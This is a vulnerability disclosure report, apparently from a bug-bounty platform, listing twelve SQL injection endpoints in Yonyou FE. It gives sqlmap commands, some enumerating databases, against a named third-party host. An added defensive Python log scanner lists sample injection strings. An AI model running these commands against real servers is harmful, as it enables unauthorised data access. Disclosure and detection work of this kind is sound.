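### Brief description:
Yonyou generic system vulnerability bundle #1
### Detailed description:
I spent a day looking at this and have bundled together the vulnerabilities I found.
This bundle covers generic vulnerabilities in the Yonyou FE collaborative office platform and contains 12 SQL injection vulnerabilities in total; surely they can't all be duplicates.
The vulnerable files and parameters are: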
```
/sys/left.jsp?lx=1
/sys/regUI.jsp?regName=111
/sys/regListUI.jsp?searchKeyvalue=111
/sys/plugin/plugin_form_edit.jsp?done=&key=a
/security/check.jsp?name=1&id=1
/sys/plugin/plugin_datasource_edit.jsp?done=&key=a
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync
/fenc/ncsubjass.jsp?subjcode=1
/cooperate/flow/selectUDR.jsp?id=1
/cooperate/flow/selectMUDR.jsp?id=1
/common/selectUDRTree.jsp?id=1
```
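
Operators of this platform can check web access logs for probing of the pages listed above. The following is an added example, not part of the original report: it flags requests to those paths whose listed parameters carry SQL syntax, or that arrive with sqlmap's default user agent. The combined log format, the regex heuristics and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Paths and parameter names copied from the list above.
WATCHED = {
    "/sys/left.jsp": {"lx"},
    "/sys/regUI.jsp": {"regName"},
    "/sys/regListUI.jsp": {"searchKeyvalue"},
    "/sys/plugin/plugin_form_edit.jsp": {"done", "key"},
    "/security/check.jsp": {"name", "id"},
    "/sys/plugin/plugin_datasource_edit.jsp": {"done", "key"},
    "/permissionsreport/pMonitor.jsp": {"photoId", "modelid"},
    "/fenc/syncbasedoc.jsp": {"pk_corp", "opt"},
    "/fenc/ncsubjass.jsp": {"subjcode"},
    "/cooperate/flow/selectUDR.jsp": {"id"},
    "/cooperate/flow/selectMUDR.jsp": {"id"},
    "/common/selectUDRTree.jsp": {"id"},
}
# Heuristic SQL markers and a combined-log-format parser (both are assumptions).
SQLI = re.compile(r"""['";]|--|/\*|\b(?:union|select|waitfor|sleep)\b|\b(?:and|or)\s+\d+\s*=\s*\d+""", re.I)
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+(?: "[^"]*" "([^"]*)")?')

def scan(lines):
    """Return (client, path, param, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, agent = m.group(1), m.group(2), m.group(3) or ""
        path, _, query = target.partition("?")
        # Drop ;jsessionid-style suffixes and collapse "//" before matching.
        path = re.sub(r"/{2,}", "/", path.split(";")[0])
        if path not in WATCHED:
            continue
        if "sqlmap" in agent.lower():
            hits.append((client, path, "*", "sqlmap user agent"))
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in WATCHED[path] and SQLI.search(value):
                hits.append((client, path, name, "SQL syntax in value"))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [05/Sep/2014:21:00:00 +0800] "GET /sys/regUI.jsp?regName=111 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Sep/2014:21:00:05 +0800] "GET /sys/regUI.jsp?regName=111%27%20UNION%20SELECT%20NULL-- HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Sep/2014:21:00:09 +0800] "GET //sys/left.jsp?lx=1%20AND%201=1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Sep/2014:21:00:12 +0800] "GET /security/check.jsp?name=1&id=1 HTTP/1.1" 200 120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]
```

Calling `scan(SAMPLE)` reports the second, third and fourth lines. The path is split on `?` by hand because a request target beginning with `//` would otherwise be parsed as a host name.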
1) SQL injection 1
/sys/plugin/plugin_form_edit.jsp?done=&key=a
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a"
![1.jpg](https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg)
2) SQL injection 2
/sys/regUI.jsp?regName=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111"
![1.jpg](https://images.seebug.org/upload/201409/052057550339e542168efa0d9188e0e1c748d67f.jpg)
3) SQL injection 3
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
![1.jpg](https://images.seebug.org/upload/201409/05210826a4dd2db85a1dfad7d0de306a1532d8f4.jpg)
4) SQL injection 4
/sys/left.jsp?lx=1
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1"
![1.jpg](https://images.seebug.org/upload/201409/052100252e1c44671ed2ad1d3ef884b40d9a5327.jpg)
5) SQL injection 5
/security/check.jsp?name=1&id=1
sqlmap -u "http://gzwnq.88ip.cn:9090/security/check.jsp?name=1&id=1"
![1.jpg](https://images.seebug.org/upload/201409/05210248cda8872620c6382c02c4bfc04ab85281.jpg)
6) SQL injection 6
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
![6.jpg](https://images.seebug.org/upload/201409/05210637952ca013bba900a61efb8f29edd77dd6.jpg)
7) SQL injection 7
/sys/regListUI.jsp?searchKeyvalue=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regListUI.jsp?searchKeyvalue=111"
![1.jpg](https://images.seebug.org/upload/201409/052059140e808d2104f009b4567fda7dda7745cb.jpg)
I won't list the rest one by one; please check them.
Ten other cases are given:
### Proof of vulnerability:
The following cases are given as proof of the vulnerability:
Proof 1:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a" --dbs
![2.jpg](https://images.seebug.org/upload/201409/052109392e62bf80cd8567b288761c38d8b89ae7.jpg)
Proof 2:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111" --dbs
![2.jpg](https://images.seebug.org/upload/201409/052110476ec7998a4a03e947785adab54bb83c58.jpg)
Proof 3:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1" --dbs
![2.jpg](https://images.seebug.org/upload/201409/05211124de3bf0067c62fd3168b2d72f6f348fc2.jpg)